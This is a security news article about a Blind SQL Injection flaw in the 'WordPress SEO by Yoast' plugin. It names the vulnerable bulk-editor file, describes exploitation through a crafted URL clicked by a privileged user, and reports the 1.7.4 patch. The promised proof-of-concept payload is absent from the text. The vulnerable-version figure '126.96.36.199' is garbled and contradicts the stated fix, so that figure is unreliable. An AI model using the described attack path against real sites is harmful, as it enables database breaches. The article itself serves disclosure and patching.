Millions of WordPress based websites are vulnerable to a Blind SQL Injection vulnerability due to a critical vulnerability in the very popular WordPress plugin “Yoast SEO”. The plugin has been updated, make sure to update your plugin.
The loophole actually present in most versions of a WordPress plugin named as ‘WordPress SEO by Yoast’. The WordPress plugin has more than 14 Million downloads according to Yoast website, making it one of the most popular WordPress plugins for easily optimizing websites for search engines i.e Search engine optimization (SEO).
The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’.
All the versions of ‘WordPress SEO by Yoast’ prior to 126.96.36.199 are vulnerable to Blind SQL Injection web application flaw, according to an advisory published.
(SQLi) SQL injection vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input.
However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the ‘admin/class-bulk-editor-list-table.php’ file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only.
Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL.
If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley.
Proof Of Concept
Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in WordPress plugin ‘WordPress SEO by Yoast’, which is as follows:
However, the loophole has reportedly been patched in the latest updated version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has “fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor.